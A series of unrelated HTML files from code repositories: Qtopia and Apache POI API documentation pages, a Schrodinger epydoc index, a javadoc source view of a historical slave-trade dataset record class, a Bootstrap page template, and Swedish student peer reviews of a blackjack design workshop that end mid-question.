href="qwidget.html#windowModified-prop">setWindowModified</a> ( bool )</li> <li><div class="fn"/><a href="qwidget.html#windowOpacity-prop">setWindowOpacity</a> ( qreal )</li> <li><div class="fn"/><a href="qwidget.html#setWindowRole">setWindowRole</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#setWindowState">setWindowState</a> ( QFlags&lt;Qt::WindowState&gt; )</li> <li><div class="fn"/><a href="qwidget.html#setWindowSurface">setWindowSurface</a> ( QWindowSurface * )</li> <li><div class="fn"/><a href="qwidget.html#windowTitle-prop">setWindowTitle</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qwidget.html#show">show</a> ()</li> <li><div class="fn"/><a href="qwidget.html#showEvent">showEvent</a> ( QShowEvent * )</li> <li><div class="fn"/><a href="qwidget.html#showFullScreen">showFullScreen</a> ()</li> <li><div class="fn"/><a href="qwidget.html#showMaximized">showMaximized</a> ()</li> <li><div class="fn"/><a href="qwidget.html#showMinimized">showMinimized</a> ()</li> <li><div class="fn"/><a href="qwidget.html#showNormal">showNormal</a> ()</li> <li><div class="fn"/><a href="qobject.html#signalsBlocked">signalsBlocked</a> () const</li> <li><div class="fn"/><a href="qwidget.html#size-prop">size</a> () const</li> <li><div class="fn"/><a href="qwidget.html#sizeHint-prop">sizeHint</a> () const</li> <li><div class="fn"/><a href="qwidget.html#sizeIncrement-prop">sizeIncrement</a> () const</li> <li><div class="fn"/><a href="qwidget.html#sizePolicy-prop">sizePolicy</a> () const</li> <li><div class="fn"/><a href="qwidget.html#stackUnder">stackUnder</a> ( QWidget * )</li> <li><div class="fn"/><a href="qobject.html#startTimer">startTimer</a> ( int )</li> <li><div class="fn"/><a href="qobject.html#staticMetaObject-var">staticMetaObject</a> : </li> <li><div class="fn"/><a href="qobject.html#staticQtMetaObject-var">staticQtMetaObject</a> : </li> <li><div class="fn"/><a href="qwidget.html#statusTip-prop">statusTip</a> () const</li> <li><div class="fn"/><a href="qwidget.html#style">style</a> () const</li> <li><div class="fn"/><a href="qwidget.html#styleSheet-prop">styleSheet</a> () const</li> <li><div class="fn"/><a href="qwidget.html#tabletEvent">tabletEvent</a> ( QTabletEvent * )</li> <li><div class="fn"/><a href="qwidget.html#testAttribute">testAttribute</a> ( Qt::WidgetAttribute ) const</li> <li><div class="fn"/><a href="qcontactselector.html#textSelected">textSelected</a> () const : bool</li> <li><div class="fn"/><a href="qcontactselector.html#textSelected-2">textSelected</a> ( const QString &amp; )</li> <li><div class="fn"/><a href="qobject.html#thread">thread</a> () const</li> <li><div class="fn"/><a href="qobject.html#timerEvent">timerEvent</a> ( QTimerEvent * )</li> <li><div class="fn"/><a href="qwidget.html#toolTip-prop">toolTip</a> () const</li> <li><div class="fn"/><a href="qobject.html#tr">tr</a> ( const char *, const char *, int )</li> <li><div class="fn"/><a href="qobject.html#trUtf8">trUtf8</a> ( const char *, const char *, int )</li> <li><div class="fn"/><a href="qwidget.html#underMouse">underMouse</a> () const</li> <li><div class="fn"/><a href="qwidget.html#cursor-prop">unsetCursor</a> ()</li> <li><div class="fn"/><a href="qwidget.html#layoutDirection-prop">unsetLayoutDirection</a> ()</li> <li><div class="fn"/><a href="qwidget.html#locale-prop">unsetLocale</a> ()</li> <li><div class="fn"/><a href="qwidget.html#update">update</a> ()</li> <li><div class="fn"/><a href="qwidget.html#update-2">update</a> ( int, int, int, int )</li> <li><div class="fn"/><a href="qwidget.html#update-3">update</a> ( const QRect &amp; )</li> <li><div class="fn"/><a href="qwidget.html#update-4">update</a> ( const QRegion &amp; )</li> <li><div class="fn"/><a href="qwidget.html#updateGeometry">updateGeometry</a> ()</li> <li><div class="fn"/><a href="qwidget.html#updateMicroFocus">updateMicroFocus</a> ()</li> <li><div class="fn"/><a href="qwidget.html#updatesEnabled-prop">updatesEnabled</a> () const</li> <li><div class="fn"/><a href="qwidget.html#visibleRegion">visibleRegion</a> () const</li> <li><div class="fn"/><a href="qwidget.html#whatsThis-prop">whatsThis</a> () const</li> <li><div class="fn"/><a href="qwidget.html#wheelEvent">wheelEvent</a> ( QWheelEvent * )</li> <li><div class="fn"/><a href="qwidget.html#width-prop">width</a> () const</li> <li><div class="fn"/><a href="qpaintdevice.html#widthMM">widthMM</a> () const</li> <li><div class="fn"/><a href="qwidget.html#winEvent">winEvent</a> ( MSG *, long * )</li> <li><div class="fn"/><a href="qwidget.html#winId">winId</a> () const</li> <li><div class="fn"/><a href="qwidget.html#window">window</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowFlags-prop">windowFlags</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowIcon-prop">windowIcon</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowIconText-prop">windowIconText</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowModality-prop">windowModality</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowOpacity-prop">windowOpacity</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowRole">windowRole</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowState">windowState</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowSurface">windowSurface</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowTitle-prop">windowTitle</a> () const</li> <li><div class="fn"/><a href="qwidget.html#windowType">windowType</a> () const</li> <li><div class="fn"/><a href="qwidget.html#x-prop">x</a> () const</li> <li><div class="fn"/><a href="qwidget.html#x11Event">x11Event</a> ( XEvent * )</li> <li><div class="fn"/><a href="qwidget.html#x11Info">x11Info</a> () const</li> <li><div class="fn"/><a href="qwidget.html#x11PictureHandle">x11PictureHandle</a> () const</li> <li><div class="fn"/><a href="qwidget.html#y-prop">y</a> () const</li> </ul> </td></tr> </table></p> <p /><address><hr /><div align="center"> <table width="100%" cellspacing="0" border="0"><tr class="address"> <td align="left">Copyright &copy; 2008 Trolltech</td> <td align="center"><a href="trademarks.html">Trademarks</a></td> <td align="right"><div align="right">Qtopia 4.3.4</div></td> </tr></table></div></address></body> </html>
Schrodinger/Schrodinger_2015-2_docs/python_api/api/toc-schrodinger.utils.cmdline-module.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>cmdline</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <h1 class="toc">Module cmdline</h1> <hr /> <h2 class="toc">Classes</h2> <a target="mainFrame" href="schrodinger.utils.cmdline.DelegatingIndentedHelpFormatter-class.html" >DelegatingIndentedHelpFormatter</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline.SingleDashOption-class.html" >SingleDashOption</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline.SingleDashOptionParser-class.html" >SingleDashOptionParser</a><br /> <h2 class="toc">Functions</h2> <div class="private"> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#_bad_option_str" >_bad_option_str</a><br /> </div> <div class="private"> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#_get_option_container" >_get_option_container</a><br /> </div> <div class="private"> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#_is_single_dash_long_opt" >_is_single_dash_long_opt</a><br /> </div> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#add_jobcontrol_diagnostic_options" >add_jobcontrol_diagnostic_options</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#add_jobcontrol_options" >add_jobcontrol_options</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#add_standard_options" >add_standard_options</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#create_argument_parser" >create_argument_parser</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#main_wrapper" >main_wrapper</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#print_version" >print_version</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#version_string" >version_string</a><br /> <h2 class="toc">Variables</h2> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#ALL" >ALL</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#DEBUG" >DEBUG</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#DEBUGGER" >DEBUGGER</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#DRIVERHOST" >DRIVERHOST</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#ENTRY" >ENTRY</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#HOST" >HOST</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#HOSTLIST" >HOSTLIST</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#HOSTS" >HOSTS</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#LIST" >LIST</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#LOCAL" >LOCAL</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#NICE" >NICE</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#NJOBS" >NJOBS</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#NOJOBID" >NOJOBID</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#NOLAUNCH" >NOLAUNCH</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#NOLOCAL" >NOLOCAL</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#NSTRUCTS" >NSTRUCTS</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#OPLSDIR" >OPLSDIR</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#RESTART" >RESTART</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#RETRIES" >RETRIES</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#SAVE" >SAVE</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#STRICT" >STRICT</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#SUBHOST" >SUBHOST</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#TMPDIR" >TMPDIR</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#VIEWNAME" >VIEWNAME</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#WAIT" >WAIT</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#WHICH" >WHICH</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#WHY" >WHY</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#__package__" >__package__</a><br /> <a target="mainFrame" href="schrodinger.utils.cmdline-module.html#version_re" >version_re</a><br /><hr /> <span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
lib/docs/apidocs/org/apache/poi/openxml4j/util/package-summary.html
setu9760/Jade_project_repo
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="ru"> <head> <title>org.apache.poi.openxml4j.util (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="org.apache.poi.openxml4j.util (POI API Documentation)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/poi/openxml4j/opc/signature/package-summary.html">Prev Package</a></li> <li><a href="../../../../../org/apache/poi/poifs/common/package-summary.html">Next Package</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/poi/openxml4j/util/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Package" class="title">Package&nbsp;org.apache.poi.openxml4j.util</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table class="packageSummary" border="0" cellpadding="3" cellspacing="0" summary="Interface Summary table, listing interfaces, and an explanation"> <caption><span>Interface Summary</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Interface</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/apache/poi/openxml4j/util/ZipEntrySource.html" title="interface in org.apache.poi.openxml4j.util">ZipEntrySource</a></td> <td class="colLast"> <div class="block">An Interface to make getting the different bits of a Zip File easy.</div> </td> </tr> </tbody> </table> </li> <li class="blockList"> <table class="packageSummary" border="0" cellpadding="3" cellspacing="0" summary="Class Summary table, listing classes, and an explanation"> <caption><span>Class Summary</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Class</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/apache/poi/openxml4j/util/Nullable.html" title="class in org.apache.poi.openxml4j.util">Nullable</a>&lt;E&gt;</td> <td class="colLast"> <div class="block">An immutable object that could be defined as null.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/apache/poi/openxml4j/util/ZipFileZipEntrySource.html" title="class in org.apache.poi.openxml4j.util">ZipFileZipEntrySource</a></td> <td class="colLast"> <div class="block">A ZipEntrySource wrapper around a ZipFile.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/apache/poi/openxml4j/util/ZipInputStreamZipEntrySource.html" title="class in org.apache.poi.openxml4j.util">ZipInputStreamZipEntrySource</a></td> <td class="colLast"> <div class="block">Provides a way to get at all the ZipEntries from a ZipInputStream, as many times as required.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/apache/poi/openxml4j/util/ZipInputStreamZipEntrySource.FakeZipEntry.html" title="class in org.apache.poi.openxml4j.util">ZipInputStreamZipEntrySource.FakeZipEntry</a></td> <td class="colLast"> <div class="block">So we can close the real zip entry and still effectively work with it.</div> </td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/poi/openxml4j/opc/signature/package-summary.html">Prev Package</a></li> <li><a href="../../../../../org/apache/poi/poifs/common/package-summary.html">Next Package</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/poi/openxml4j/util/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small> <i>Copyright 2014 The Apache Software Foundation or its licensors, as applicable.</i> </small></p> </body> </html>
datasets/java/slavery/docs/src-html/corgis/slavery/domain/TransactionRecord.html
RealTimeWeb/datasets
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>Source code</title> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <div class="sourceContainer"> <pre><span class="sourceLineNo">001</span>package corgis.slavery.domain;<a name="line.1"></a> <span class="sourceLineNo">002</span><a name="line.2"></a> <span class="sourceLineNo">003</span>import java.util.List;<a name="line.3"></a> <span class="sourceLineNo">004</span>import java.util.ArrayList;<a name="line.4"></a> <span class="sourceLineNo">005</span>import java.util.Arrays;<a name="line.5"></a> <span class="sourceLineNo">006</span>import java.util.HashMap;<a name="line.6"></a> <span class="sourceLineNo">007</span>import java.util.Iterator;<a name="line.7"></a> <span class="sourceLineNo">008</span>import java.util.Map;<a name="line.8"></a> <span class="sourceLineNo">009</span><a name="line.9"></a> <span class="sourceLineNo">010</span>import org.json.simple.JSONArray;<a name="line.10"></a> <span class="sourceLineNo">011</span>import org.json.simple.JSONObject;<a name="line.11"></a> <span class="sourceLineNo">012</span><a name="line.12"></a> <span class="sourceLineNo">013</span>import corgis.slavery.domain.Buyer;<a name="line.13"></a> <span class="sourceLineNo">014</span>import corgis.slavery.domain.Transaction;<a name="line.14"></a> <span class="sourceLineNo">015</span>import corgis.slavery.domain.Slave;<a name="line.15"></a> <span class="sourceLineNo">016</span>import corgis.slavery.domain.Seller;<a name="line.16"></a> <span class="sourceLineNo">017</span><a name="line.17"></a> <span class="sourceLineNo">018</span>/**<a name="line.18"></a> <span class="sourceLineNo">019</span> * <a name="line.19"></a> <span class="sourceLineNo">020</span> */<a name="line.20"></a> <span class="sourceLineNo">021</span>public class TransactionRecord {<a name="line.21"></a> <span class="sourceLineNo">022</span> <a name="line.22"></a> <span class="sourceLineNo">023</span> private Buyer buyer;<a name="line.23"></a> <span class="sourceLineNo">024</span> private Transaction transaction;<a name="line.24"></a> <span class="sourceLineNo">025</span> private Slave slave;<a name="line.25"></a> <span class="sourceLineNo">026</span> private Seller seller;<a name="line.26"></a> <span class="sourceLineNo">027</span> <a name="line.27"></a> <span class="sourceLineNo">028</span> <a name="line.28"></a> <span class="sourceLineNo">029</span> /*<a name="line.29"></a> <span class="sourceLineNo">030</span> * @return <a name="line.30"></a> <span class="sourceLineNo">031</span> */<a name="line.31"></a> <span class="sourceLineNo">032</span> public Buyer getBuyer() {<a name="line.32"></a> <span class="sourceLineNo">033</span> return this.buyer;<a name="line.33"></a> <span class="sourceLineNo">034</span> }<a name="line.34"></a> <span class="sourceLineNo">035</span> <a name="line.35"></a> <span class="sourceLineNo">036</span> <a name="line.36"></a> <span class="sourceLineNo">037</span> <a name="line.37"></a> <span class="sourceLineNo">038</span> /*<a name="line.38"></a> <span class="sourceLineNo">039</span> * @return <a name="line.39"></a> <span class="sourceLineNo">040</span> */<a name="line.40"></a> <span class="sourceLineNo">041</span> public Transaction getTransaction() {<a name="line.41"></a> <span class="sourceLineNo">042</span> return this.transaction;<a name="line.42"></a> <span class="sourceLineNo">043</span> }<a name="line.43"></a> <span class="sourceLineNo">044</span> <a name="line.44"></a> <span class="sourceLineNo">045</span> <a name="line.45"></a> <span class="sourceLineNo">046</span> <a name="line.46"></a> <span class="sourceLineNo">047</span> /*<a name="line.47"></a> <span class="sourceLineNo">048</span> * @return <a name="line.48"></a> <span class="sourceLineNo">049</span> */<a name="line.49"></a> <span class="sourceLineNo">050</span> public Slave getSlave() {<a name="line.50"></a> <span class="sourceLineNo">051</span> return this.slave;<a name="line.51"></a> <span class="sourceLineNo">052</span> }<a name="line.52"></a> <span class="sourceLineNo">053</span> <a name="line.53"></a> <span class="sourceLineNo">054</span> <a name="line.54"></a> <span class="sourceLineNo">055</span> <a name="line.55"></a> <span class="sourceLineNo">056</span> /*<a name="line.56"></a> <span class="sourceLineNo">057</span> * @return <a name="line.57"></a> <span class="sourceLineNo">058</span> */<a name="line.58"></a> <span class="sourceLineNo">059</span> public Seller getSeller() {<a name="line.59"></a> <span class="sourceLineNo">060</span> return this.seller;<a name="line.60"></a> <span class="sourceLineNo">061</span> }<a name="line.61"></a> <span class="sourceLineNo">062</span> <a name="line.62"></a> <span class="sourceLineNo">063</span> <a name="line.63"></a> <span class="sourceLineNo">064</span> <a name="line.64"></a> <span class="sourceLineNo">065</span> <a name="line.65"></a> <span class="sourceLineNo">066</span> /**<a name="line.66"></a> <span class="sourceLineNo">067</span> * Creates a string based representation of this TransactionRecord.<a name="line.67"></a> <span class="sourceLineNo">068</span> <a name="line.68"></a> <span class="sourceLineNo">069</span> * @return String<a name="line.69"></a> <span class="sourceLineNo">070</span> */<a name="line.70"></a> <span class="sourceLineNo">071</span> public String toString() {<a name="line.71"></a> <span class="sourceLineNo">072</span> return "TransactionRecord[" +buyer+", "+transaction+", "+slave+", "+seller+"]";<a name="line.72"></a> <span class="sourceLineNo">073</span> }<a name="line.73"></a> <span class="sourceLineNo">074</span> <a name="line.74"></a> <span class="sourceLineNo">075</span> /**<a name="line.75"></a> <span class="sourceLineNo">076</span> * Internal constructor to create a TransactionRecord from a representation.<a name="line.76"></a> <span class="sourceLineNo">077</span> * @param json_data The raw json data that will be parsed.<a name="line.77"></a> <span class="sourceLineNo">078</span> */<a name="line.78"></a> <span class="sourceLineNo">079</span> public TransactionRecord(JSONObject json_data) {<a name="line.79"></a> <span class="sourceLineNo">080</span> try {// Buyer<a name="line.80"></a> <span class="sourceLineNo">081</span> this.buyer = new Buyer((JSONObject)json_data.get("Buyer"));// Transaction<a name="line.81"></a> <span class="sourceLineNo">082</span> this.transaction = new Transaction((JSONObject)json_data.get("Transaction"));// Slave<a name="line.82"></a> <span class="sourceLineNo">083</span> this.slave = new Slave((JSONObject)json_data.get("Slave"));// Seller<a name="line.83"></a> <span class="sourceLineNo">084</span> this.seller = new Seller((JSONObject)json_data.get("Seller"));<a name="line.84"></a> <span class="sourceLineNo">085</span> } catch (NullPointerException e) {<a name="line.85"></a> <span class="sourceLineNo">086</span> System.err.println("Could not convert the response to a TransactionRecord; a field was missing.");<a name="line.86"></a> <span class="sourceLineNo">087</span> e.printStackTrace();<a name="line.87"></a> <span class="sourceLineNo">088</span> } catch (ClassCastException e) {<a name="line.88"></a> <span class="sourceLineNo">089</span> System.err.println("Could not convert the response to a TransactionRecord; a field had the wrong structure.");<a name="line.89"></a> <span class="sourceLineNo">090</span> e.printStackTrace();<a name="line.90"></a> <span class="sourceLineNo">091</span> }<a name="line.91"></a> <span class="sourceLineNo">092</span> } <a name="line.92"></a> <span class="sourceLineNo">093</span>}<a name="line.93"></a> </pre> </div> </body> </html>
pages/template.html
severedblaze/severed
<!DOCTYPE html> <html> <head> <title>Welcome to the page!</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link type="text/css" rel="stylesheet" href="../css/bootstrap.css"> <link type="text/css" rel="stylesheet" href="../css/bootstrap-theme.css"> <link type="text/css" rel="stylesheet" href="../css/custom.css"> <link type="text/css" rel="stylesheet" href="../css/font-awesome.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script> $(function(){ $('#header').load('../headfoot/header.html'); $('#footer').load('../headfoot/footer.html'); }); </script> <script> jQuery(document).ready(function() { var offset = 220; var duration = 500; jQuery(window).scroll(function() { if (jQuery(this).scrollTop() > offset) { jQuery('.back-to-top').fadeIn(duration); } else { jQuery('.back-to-top').fadeOut(duration); } }); jQuery('.back-to-top').click(function(event) { event.preventDefault(); jQuery('html, body').animate({scrollTop: 0}, duration); return false; }) }); </script> </head> <body> <div id="header"></div> <div class="content-container"> </div> <div id="footer"></div> <script type="text/javascript" src="js/bootstrap.js"></script> </body> </html>
pages/workshop-3.html
mh222zr/1DV407-Workshops
<!doctype html> <html lang="sv"> <head> <meta charset="UTF-8"> <title>Workshop 3 - Marco Hyyryläinen</title> <!-- Bootstrap --> <link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet"> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script> <style> body { width: 600px; margin: 0 auto 30px auto; } img { max-width: 600px; height: auto; } </style> </head> <body> <h1>Workshop 3 - Marco Hyyryläinen (mh222zr)</h1> <p><a href="../index.html">Tillbaka till index</a></p> <!-- Nav tabs --> <ul class="nav nav-tabs"> <li class="active"><a href="#workshop-3" data-toggle="tab">Mitt projekt</a></li> <li><a href="#workshop-3-peer-1" data-toggle="tab">PR av Claesson</a></li> <li><a href="#workshop-3-peer-3" data-toggle="tab">PR för Olsson</a></li> <li><a href="#workshop-3-peer-4" data-toggle="tab">PR för Rajabion</a></li> </ul> <!-- Tab panes --> <div class="tab-content"> <div class="tab-pane active" id="workshop-3"> <br> <p><a href="https://github.com/mh222zr/OOAD-Workshop-3">Källkod.</a></p> <p><a href="https://raw.githubusercontent.com/mh222zr/OOAD-Workshop-3/master/ClassDiagram.png">Klassdiagram.</a></p> </div> <div class="tab-pane" id="workshop-3-peer-1"> <h3>Peer review av Mathias Claesson</h3> <h4>Try to compile/use the source code provided. Can you get it up and running? Is anything problematic?</h4> <p>Det fungerade bra. Inga problem med att kompilera koden eller köra prgrammet.</p> <h4>Test the runnable version of the application in a realistic way. Note any problems/bugs.</h4> <p>Det första var att dealerns gömda kort var inte gömt. På grund av det så kunde dealern vinna utan att playern kunde få ta ett kort. Det påverkar varnadra där.</p> <p>(Jag blir själv lite osäker på om det ska vara automatiserat om player hamnar över 21. Så ska det automatiskt gå över till dealern? Man ska int behöva trycka på “Stand”.)</p> <h4>Does the implementation and diagrams conform (do they show the same thing)? Are there any missing relations? Relations in the wrong direction?</h4> <p>Ja, vad jag kunde se så stämde dom överens. Inga fel i själva diagrammet med relationer. </p> <h4>Is the dependency between controller and view handled? How? Good? Bad?</h4> <p>Det var löst vad jag kunde se. Fast kanske skulle tagit bort att hantera int i playgame helt. Skicka in en enum kanske.</p> <h4>Is the Strategy Pattern used correctly for the rule variant Soft17?</h4> <p>Fick inte dom korten jag vill i programmet. Men vad jag kunde se i koden så såg det bra ut.</p> <h4>Is the Strategy Pattern used correctly for the variations of who wins the game?</h4> <p>Ja, det var löst.</p> <h4>Is the duplicate code removed from everywhere and put in a place that does not add any dependencies (What class already knows about cards and the deck)? Are interfaces updated to reflect the change?</h4> <p>Jag kunde se den dubblerade koden i så jobbet på det var inte riktigt slutfört. </p> <h4>Is the Observer Pattern correctly implemented?</h4> <p>Det fungerade riktigt bra. </p> <h4>Is the class diagram updated to reflect the changes?</h4> <p>Ja, klass diagrammet var uppdaterat Ser inga problem i det.</p> <h4>Do you think the design/implementation has passed the grade 3 criteria?</h4> <p>Vad jag kunde se utav det jag tittade på så såg det bra ut. Lite buggar som behöver fixas. Men jag tycker överlag att det inte är några större fel på koden och jobbet som är gjort. Inga problem med diagrammet som är gjort. Lätt förstårligt och bra utfört. </p> <p>Om det skulle bli godkänt. Nja, jo, Jag skulle nog godkänna det trots lite fel. Det märks att allt är genomtänkt. Syftet med uppgiften är klar tycker jag.</p> </div> <div class="tab-pane" id="workshop-3-peer-2"> </div> <div class="tab-pane" id="workshop-3-peer-3"> <h3>Peer Review för Nils-Jakob Olsson</h3> <h4>Try to compile/use the source code provided. Can you get it up and running? Is anything problematic?</h4> <p>Det fungerade bra. Inga problem med att kompilera koden eller köra programmet.</p> <h4>Test the runnable version of the application in a realistic way. Note any problems/bugs.</h4> <p>Inte vad jag kunde hitta.</p> <h4>Does the implementation and diagrams conform (do they show the same thing)? Are there any missing relations? Relations in the wrong direction?</h4> <p>Ja, vad jag kunde se så stämde dom överens. Inga fel i själva diagrammet med relationer. </p> <h4>Is the dependency between controller and view handled? How? Good? Bad?</h4> <p>Det var löst vad jag kunde se med en enum i view. Snygg löst.</p> <h4>Is the Strategy Pattern used correctly for the rule variant Soft17?</h4> <p>Eftersom jag är jättedålig på poker så kunde jag inte få till det i spelet (eller i verkligheten), men det jag såg i koden såg korrekt ut.</p> <h4>Is the Strategy Pattern used correctly for the variations of who wins the game?</h4> <p>Ja, det var löst.</p> <h4>Is the duplicate code removed from everywhere?</h4> <p>Den duplicerade koden är bortagen vad jag kunde se.</p> <h4>Is the Observer Pattern correctly implemented?</h4> <p>Ja, det fungerade riktigt bra. </p> <h4>Is the class diagram updated to reflect the changes?</h4> <p>Klassdiagramet var uppdaterat med rätt klasser. Jag ser inga felaktigheter med det.</p> <h4>Do you 